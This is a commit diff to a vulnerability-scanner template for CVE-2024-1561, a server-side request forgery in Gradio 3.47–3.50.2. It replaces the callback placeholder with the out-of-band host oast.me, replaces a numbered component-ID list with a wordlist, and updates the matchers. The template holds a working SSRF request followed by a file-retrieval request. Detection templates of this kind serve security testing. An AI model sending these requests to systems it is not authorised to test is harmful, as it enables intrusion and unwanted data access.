updated matcher & payload

2024-06-16 12:16:12 +05:30 · 2024-06-16 12:16:12 +05:30 · ff289f11b1
parent e83f7471c5
commit ff289f11b1
1 changed files with 8 additions and 28 deletions
--- a/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml
+++ b/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml
@ -1,7 +1,7 @@
 id: CVE-2024-1561-3x-ssrf

 info:
-  name: Gradio 3.47 - 3.50.2 - Server Side Request Forgery
+  name: Gradio 3.47 - 3.50.2 - Server-Side Request Forgery
  author: nvn1729
  severity: high
  description: |
@ -26,7 +26,7 @@ http:
        Host: {{Hostname}}
        Content-Type: application/json

-        {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
+        {"component_id": "{{fuzz_component_id}}", "data": "http://oast.me", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}

      - |
        GET /file={{download_path}} HTTP/1.1
@ -36,41 +36,21 @@ http:
      - type: regex
        part: body
        name: download_path
-        internal: true
        group: 1
        regex:
          - "\"?([^\"]+)"
+        internal: true

    payloads:
-      fuzz_component_id:
-        - 1
-        - 2
-        - 3
-        - 4
-        - 5
-        - 6
-        - 7
-        - 8
-        - 9
-        - 10
-        - 11
-        - 12
-        - 13
-        - 14
-        - 15
-        - 16
-        - 17
-        - 18
-        - 19
-        - 20
+      fuzz_component_id: helpers/wordlists/numbers.txt

    stop-at-first-match: true
    matchers-condition: and
    matchers:
-      - type: regex
-        part: body
-        regex:
-          - <html><head></head><body>[a-z0-9]+</body></html>
+      - type: word
+        part: body_2
+        words:
+          - "<h1> Interactsh Server </h1>"

      - type: status
        status: